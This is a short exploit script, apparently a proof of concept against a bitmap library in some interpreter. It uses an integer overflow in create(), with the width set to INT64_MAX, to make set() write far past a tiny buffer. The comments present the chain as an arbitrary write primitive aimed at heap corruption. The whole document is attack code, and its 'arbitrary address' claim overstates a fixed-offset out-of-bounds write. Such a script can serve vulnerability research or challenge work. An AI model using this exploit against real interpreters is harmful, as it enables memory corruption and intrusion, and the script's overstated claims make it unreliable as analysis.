# EXPLOIT: Bitmap Create - Arbitrary Write Primitive
#
# CONFIRMED: create(9223372036854775807, 2) bypasses bounds check!
#
# The exploit chain:
# 1. Create bitmap with INT64_MAX width → tiny buffer allocated
# 2. set() operations calculate: index = y * INT64_MAX + x
# 3. With y=1, index = INT64_MAX (huge offset)
# 4. Write goes to: bitmap_data + (INT64_MAX / 8) = arbitrary address!
#
# This gives us an ARBITRARY WRITE primitive!

# Step 1: Create the vulnerable bitmap
bitmap b1 = create(9223372036854775807, 2);

# Step 2: Test with y=0 (should be within buffer)
set(b1, 0, 0, 1);
int val1 = get(b1, 0, 0);
print(val1);

# Step 3: Test with y=1 (should cause huge offset)
# index = 1 * INT64_MAX + 0 = INT64_MAX
# byte_offset = INT64_MAX / 8 = 0x0FFFFFFFFFFFFFFF
# This should write way beyond the tiny buffer!
set(b1, 0, 1, 1);
int val2 = get(b1, 0, 1);
print(val2);

# Step 4: Try to trigger heap corruption
# The write at y=1 should hit memory way beyond the buffer
# This might corrupt heap metadata or adjacent structures

print("Arbitrary write test completed");

